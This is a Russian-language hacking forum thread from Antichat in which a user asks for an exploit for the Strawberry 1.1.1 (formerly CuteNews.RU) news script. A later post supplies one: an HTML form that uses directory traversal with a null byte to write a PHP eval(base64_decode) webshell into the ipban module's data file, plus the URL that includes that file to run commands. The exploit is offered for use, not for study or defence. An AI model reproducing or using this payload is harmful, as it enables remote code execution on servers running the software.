ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Есть ли сплоит для Strawberry 1.1.1 ?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Есть ли сплоит для Strawberry 1.1.1 ?
  #1  
Старый 18.10.2006, 13:19
Аватар для Nosferatu
Nosferatu
Новичок
Регистрация: 15.10.2006
Сообщений: 1
Провел на форуме:
17482

Репутация: 0
Question Есть ли сплоит для Strawberry 1.1.1 ?
Народ,пожалуйста помогите найти сплоит для Strawberry 1.1.1, или хотябы описание уязвимостей....
 
Ответить с цитированием

  #2  
Старый 18.10.2006, 15:02
Аватар для _-[A.M.D]HiM@S-_
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию
Если я неправ поправьте.
Это названия версии движка было недавно переминовано с CuteNews на Strawberry.

Strawberry
Теперь новостной скрипт CuteNews.RU называется Strawberry!
 
Ответить с цитированием

  #3  
Старый 18.10.2006, 15:21
Аватар для Koller
Koller
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924

Репутация: 931
По умолчанию
Нет...ты не ошибаешься...все именно так...
 
Ответить с цитированием

StrawBerry 1.1.1 LFI / Remote Code Execution Exploit
  #4  
Старый 10.05.2009, 13:09
Аватар для [AVT]
[AVT]
Новичок
Регистрация: 20.12.2007
Сообщений: 19
Провел на форуме:
373780

Репутация: 52
По умолчанию StrawBerry 1.1.1 LFI / Remote Code Execution Exploit
Развивая тему _http://forum.antichat.ru/showpost.php?p=953944&postcount=71

Выполняем POST-запрос:
Код:
<form method="post" action="http://localhost/strawberry/example/index.php?do=../../../../../inc/mod/ipban.mdu%00">
<input type="text" name="add_ip" value="<h1><?php eval(base64_decode($_GET[cmd]));?></h1>">
<input type="hidden" name="action" value="add">
<input type="hidden" name="mod" value="ipban">
<input type="submit" value="First time">
</form>
Шелл: http://localhost/strawberry/example/index.php?cmd=cGhwaW5mbygpOw==&do=../../../../db/base/ipban.MYD%00

+ Не нужно расшифровывать md5(md5()) хеш админа.

Уточнение: "/example/" - это не пример каталога, а папка в движке StrawBerry.
Последний раз редактировалось [AVT]; 10.05.2009 в 13:44..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
«Лаборатории Касперского»: Количество вредоносных программ под Linux резко возросло dinar_007 Мировые новости 9 20.08.2006 20:50
ОТЛИЧНАЯ СТАТЬЯ - "Как заметать следы" foreva Чужие Статьи 8 07.02.2005 12:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ